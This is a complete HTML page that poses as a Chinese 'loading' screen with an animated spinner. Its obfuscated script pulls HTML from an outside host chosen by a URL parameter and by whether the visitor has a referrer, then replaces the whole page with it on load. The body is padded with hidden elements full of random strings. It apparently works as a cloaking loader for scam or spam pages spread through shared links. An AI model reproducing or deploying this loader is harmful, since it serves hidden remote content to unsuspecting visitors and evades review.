<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .CQ19Pq {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .CQ19Pq .ZSl0k1Cxxwf {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .CQ19Pq .content {
            line-height: 50px;
            text-align: center
        }

        .CQ19Pq .img {
            width: 100%
        }

        .CQ19Pq .RGWVG1l {
            text-align: center
        }

        .CQ19Pq .RGWVG1l span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .CQ19Pq .RGWVG1l span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .CQ19Pq .RGWVG1l span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .CQ19Pq .RGWVG1l span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .CQ19Pq .RGWVG1l span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .CQ19Pq .RGWVG1l span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .CQ19Pq .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function lFA8tt9F9pE8U(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var pzTsQJj = lFA8tt9F9pE8U('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ pzTsQJj +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ pzTsQJj +".html?a=share";
		}
		
        xJXVRbbn=url+"#"+new Date().getTime();
        xJXVRbbn && function() {
            $.get(xJXVRbbn, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >KzMNgjmg3Pf93yGTTS1Jr5CbuzEiYR0koxSJd2H4ghoT2SH8NR7m1PzJDoipYYr9p72kBE4yrYgTA2EN4ikEnUDs0O61jfYpBMHN</ul>
<h1 style='display:none' >OrzlUktOYpbxouWXr9mIavO0V0</h1>
<li style='display:none' >Fd7tv3tZ1Q8lbtB4oEmqoRE6VetPvjKs0qNn8g5QpLZua3IYQmpYFm7ZZisowpfocESBUKrKlceV9RXer1</li>
<li style='display:none' >Fd7tv3tZ1Q8lbtB4oEmqoRE6VetPvjKs0qNn8g5QpLZua3IYQmpYFm7ZZisowpfocESBUKrKlceV9RXer1</li><div class="CQ19Pq">
    <div class="ZSl0k1Cxxwf">
        <div class="RGWVG1l">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>tLcab7kdTRp2PYDYvb19S</p>
<span style='display:none'>fHf2vFPNw9rN3lrMZsKrnd7KCxUpxGj1EPUYLL65yKkynPAWmgctj1SD33VihfUpJ2P3w7nq</span>
<p  style='display:none'>tLcab7kdTRp2PYDYvb19S</p></body>
</html>